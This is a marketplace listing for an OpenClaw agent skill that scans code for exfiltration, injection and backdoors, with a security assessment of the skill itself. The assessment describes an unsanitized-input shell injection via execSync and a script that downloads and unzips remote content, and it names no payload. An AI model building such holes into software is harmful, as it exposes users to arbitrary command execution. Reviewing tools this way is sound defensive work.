← Back to Skills Marketplace
248
Downloads
0
Stars
0
Active Installs
1
Versions
Install in OpenClaw
/install skill-sec-scan-en
Description
自动检测 JavaScript、TypeScript、Python 和 Shell 文件中的数据外泄、注入、代码混淆与木马后门等安全风险并生成详细报告。
Usage Guidance
This skill appears internally consistent with its stated purpose (a static security scanner). Before running it: (1) review scripts/scan.sh and scan-all.sh to confirm how they handle remote URLs (cloning/downloading) and whether they execute any network commands; (2) run the scanner in a sandboxed environment or VM and avoid running it as root; (3) if you intend to scan your installed skills, consider copying the skills directory to a safe location first; (4) be aware the scanner uses regex-based detection so expect false positives/negatives—manually inspect any reported findings; (5) the skill will create/read whitelist.txt in its own directory and will execute its scripts locally (via child_process.execSync), which is normal but means it has the ability to perform side-effecting actions permitted by your account. If you are unsure about allowing shell/script execution or network access, inspect the shell scripts line-by-line or run them in an isolated container before using them with real repositories or sensitive directories.
Capability Analysis
Type: OpenClaw Skill
Name: skill-sec-scan-en
Version: 1.0.0
The skill is a security scanner designed to perform static analysis on other OpenClaw skills. While its stated purpose is defensive, it contains a critical Shell Injection vulnerability in `index.js`, where user-supplied arguments are passed unsanitized to `child_process.execSync`. Additionally, `scripts/scan.sh` performs network requests to an external endpoint (`wry-manatee-359.convex.site`) to download and unzip remote content, which is a high-risk behavior for a security tool. These flaws allow for potential arbitrary command execution if a user provides a crafted skill name or URL.
Capability Assessment
Purpose & Capability
The name/description (security scanner for JS/TS/Python/Shell) matches the provided artifacts: a CLI wrapper (index.js), a Node scanner (node/scanner.js) implementing regex rules, and shell scripts (scripts/scan.sh, scan-all.sh). No unrelated environment variables, binaries, or cloud credentials are requested.
Instruction Scope
SKILL.md explicitly instructs the agent to run local scripts (./scripts/scan.sh, ./scripts/scan-all.sh) against local skill directories and remote URLs. That behavior is coherent for a scanner, but it means the skill will read arbitrary skill directories (e.g., ~/.openclaw/workspace/skills) and may fetch/inspect remote repos. The instructions give the agent permission to execute the included shell scripts (and the code does so via execSync), so the runtime has the ability to perform filesystem and network operations consistent with a scanner.
Install Mechanism
No install spec is declared (instruction-only at registry level), and the bundle includes local scripts and Node code that will be executed in-place. There are no downloads from untrusted URLs during an install step. This is appropriate for a script-based scanner, but note the skill executes those local scripts when invoked.
Credentials
The skill declares no required environment variables or credentials. The scanner's detection rules look for occurrences of cloud-related env vars inside target code (e.g., process.env.AWS_), which is expected for a security scanner and does not imply the skill needs those secrets itself.
Persistence & Privilege
always:false (normal). The skill does not request permanent system-wide presence and does not modify other skills' configurations in the provided files. It will create/read a local whitelist file inside its package and read user skill directories when run; autonomous invocation is allowed by default (normal) but not forced.
How to Use
- Make sure OpenClaw is installed (local or Docker)
- Run the install command in chat:
/install skill-sec-scan-en - After installation, invoke the skill by name or use
/skill-sec-scan-en - Provide required inputs per the skill's parameter spec and get structured output
Version History
v1.0.0
Skill Security Scanner v1.0.0 — Initial Release
- Introduces an enterprise-grade skill security scanner supporting JavaScript, TypeScript, Python, and Shell file types.
- Detects four major threat categories: data exfiltration, injection attacks, code obfuscation, and trojans/backdoors.
- Implements 57 detailed detection rules, covering 60+ dangerous operation patterns.
- Features an intelligence-driven static analysis engine with quantitative scoring (0–100) and clear risk levels.
- Supports remote (ClawHub/GitHub) and local scanning, batch operations, detailed risk reports, and user-defined whitelists.
- Provides standard report templates, natural language triggers, and full documentation for usage and result interpretation.
Metadata
Frequently Asked Questions
What is Skill Security Scanner?
自动检测 JavaScript、TypeScript、Python 和 Shell 文件中的数据外泄、注入、代码混淆与木马后门等安全风险并生成详细报告。 It is an AI Agent Skill for Claude Code / OpenClaw, with 248 downloads so far.
How do I install Skill Security Scanner?
Run "/install skill-sec-scan-en" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.
Is Skill Security Scanner free?
Yes, Skill Security Scanner is completely free, licensed under MIT-0. You can download, install and use it at no cost.
Which platforms does Skill Security Scanner support?
Skill Security Scanner is cross-platform and runs anywhere OpenClaw / Claude Code is available (cross-platform).
Who created Skill Security Scanner?
It is built and maintained by moer (@torchesfrms); the current version is v1.0.0.
More Skills